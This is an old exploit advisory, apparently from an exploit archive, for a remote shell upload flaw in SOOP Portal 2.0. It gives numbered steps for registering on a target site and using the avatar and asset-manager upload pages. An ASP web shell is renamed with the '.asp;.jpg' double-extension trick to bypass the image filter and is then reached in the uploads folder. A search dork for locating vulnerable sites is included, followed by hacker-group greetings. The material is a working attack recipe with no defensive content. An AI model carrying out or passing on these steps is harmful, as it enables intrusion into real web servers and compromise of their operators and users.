ExploitFixes
SOOP Portal 2.0 Remote Upload Shell Vulnerability 2010-12-05 09:16:35

#################################################################
# I N F O
# Exploit Title: SOOP Portal 2.0 Remote Upload Shell Vulnerability
# DDate: 05-12-2010
# Author: Net.Edit0r
# Software Link: www.soopportal.com
# Version: 2.0
# Tested on: windows server 2008
# Contact: [email protected] ~ [email protected]

[~]######################################### E X P L O I T
#############################################[~]
#
# 1. Register On Site
#
# 2. http://server/member_form.asp?do=5&mid=4
#
# 3. Current avatar [ Browse/Upload ]
#
# 4. http://server/assetman3.asp?mode=1&ffilter=image
#
# 4. Asp renamed via the .asp;.jpg (shell.asp;.jpg)
#
# 5. http://server/uploads/ [You can get the address at the
See Shell Shell upload]
#
# 6. In this section, file in the folder that you have selected in
the previous section is placed .
#
# 7 . Example URL : http://server/uploads/
#
# Dork : "SOOP Portal 2.0"
#
#
[~]######################################### ThankS To ...
###########################################[~]
#
# Special Thanks To : HUrr!c4nE, Cair3x, B3hz4d, M4hd1,
Skitt3r,Hussin-v ,Virus_Baghdad ,snIPer alBlDeat
#
# 7-Team: virangar, H-SK33PY , farzadho ,n3me3iz ,mmilad200 , fr0nk,
bLaCk.bytE , Satanic2000
#
# BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker ~ Mikili
#
[~]######################################### FinisH :D
#############################################[~]